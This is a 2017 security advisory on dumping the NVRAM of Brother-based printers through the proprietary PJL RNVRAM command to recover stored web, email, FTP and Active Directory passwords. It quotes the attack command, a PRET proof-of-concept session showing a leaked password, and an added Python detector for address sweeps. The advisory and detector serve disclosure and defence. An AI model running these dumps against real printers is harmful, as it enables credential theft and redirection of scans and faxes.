
Hacking Printers Advisory 3

Posted Jan 31, 2017
Authored by Jens Mueller

This post is about abusing Brother's proprietary PJL extensions to dump the printer's NVRAM and gain access to interesting stuff like passwords.

tags | advisory
SHA-256 | 64ec02b37690bb546138e1297152bd405cb48e04234c442b4a8aec0a22fd3850

TL;DR:  In the scope of academic research on printer security, various
vulnerabilities in network printers and MFPs have been discovered. This
is advisory 3 of 6 of the `Hacking Printers' series. Each advisory
discusses multiple issues of the same category. This post is about
abusing Brother's proprietary PJL extensions to dump the printer's NVRAM
and gain access to interesting stuff like passwords. The attack can be
performed by anyone who can print, for example through USB or network.
It can even be carried out by a malicious website, using advanced
cross-site printing techniques in combination with a novel technique we
call `CORS spoofing' (see
http://hacking-printers.net/wiki/index.php/Cross-site_printing).

======================[ Memory Access with PJL ]======================

-------------------------[ Affected Devices ]-------------------------

This vulnerability may potentially affect all Brother-based laser
printers. It has been verified for the devices listed below:

- Brother MFC-9120CN (Firmware version: K.1.06)
- Brother DCP-9045CDN (Firmware version: G.1.10)
- Konica Minolta bizhub 20p (Firmware version: 3.11)

Vendors informed: 2016-10-17

--------------------[ Vulnerability Description ]---------------------

The `Brother Laser Printer Technical Reference Guide' defines PJL
commands to `write data to or retrieve data from the specified address
of the printer's NVRAM':

----------------------------------------------------------------------
@PJL RNVRAM ADDRESS = X
----------------------------------------------------------------------

By incrementing the integer X and dumping the whole NVRAM, an attacker
can gain access to the embedded web server passwords. Furthermore, if
set, user PINs and passwords for POP3/SMTP as well as for FTP and Active
Directory profiles can be obtained. For MFPs, the attacker may also be
able to change the Scan-to-FTP settings so that scanned documents are
delivered to an attacker-controlled FTP server, or exchange fax
numbers in the address book so that faxes are sent to the attacker's fax
number instead.

This issue is not new. It has been discussed by Andrei Costin and
others. However it still seems to be present in Brother devices.
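
For defenders, the access pattern described above (many RNVRAM reads with
an incrementing address) is easy to spot in raw print job data. The
following is an added detection example, not part of the original advisory
or of PRET. The function names, the sweep threshold, the assumption that
addresses are written in decimal, and the sample jobs are all constructed
for illustration.

```python
import re

UEL = b"\x1b%-12345X"  # PJL Universal Exit Language marker framing a job

# The read command quoted in the advisory; decimal addresses are an assumption.
RNVRAM_RE = re.compile(rb"@PJL\s+RNVRAM\s+ADDRESS\s*=\s*(\d+)", re.IGNORECASE)


def find_nvram_reads(job):
    """Return every NVRAM address a raw print job asks the printer to read."""
    return [int(m.group(1)) for m in RNVRAM_RE.finditer(job)]


def longest_sweep(addresses, max_step=1):
    """Length of the longest run of increasing addresses (step <= max_step)."""
    best = run = 1 if addresses else 0
    for prev, cur in zip(addresses, addresses[1:]):
        run = run + 1 if 0 < cur - prev <= max_step else 1
        best = max(best, run)
    return best


def classify_job(job, sweep_threshold=16):
    """'clean', 'nvram-read' (isolated reads) or 'nvram-dump' (address sweep)."""
    addresses = find_nvram_reads(job)
    if not addresses:
        return "clean"
    if longest_sweep(addresses) >= sweep_threshold:
        return "nvram-dump"
    return "nvram-read"


# Constructed sample jobs (not captured traffic).
CLEAN_JOB = UEL + b'@PJL JOB NAME = "report"\r\n@PJL ENTER LANGUAGE = PCL\r\n' + UEL
SINGLE_READ = UEL + b"@pjl rnvram address=42\r\n" + UEL
DUMP_JOB = UEL + b"".join(
    b"@PJL RNVRAM ADDRESS = %d\r\n" % a for a in range(64)
) + UEL

if __name__ == "__main__":
    for name, job in [("clean", CLEAN_JOB), ("single", SINGLE_READ), ("dump", DUMP_JOB)]:
        print(name, classify_job(job), find_nvram_reads(job)[:4])
```

Ordinary print jobs have no reason to contain this command, so a print
server or spool filter can treat any hit as worth logging or rejecting.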

-------------------------[ Proof of Concept ]-------------------------

A Python-based proof-of-concept tool, the Printer Exploitation Toolkit
(PRET), has been published. The attack can be reproduced as follows:

$ git clone https://github.com/RUB-NDS/PRET.git
$ cd PRET
$ ./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

-----------------------[ Further Information ]------------------------

Information on Brother's NVRAM access bug/feature can be found at:
http://hacking-printers.net/wiki/index.php/Memory_access
http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf
http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf
http://seclists.org/fulldisclosure/2013/Feb/40

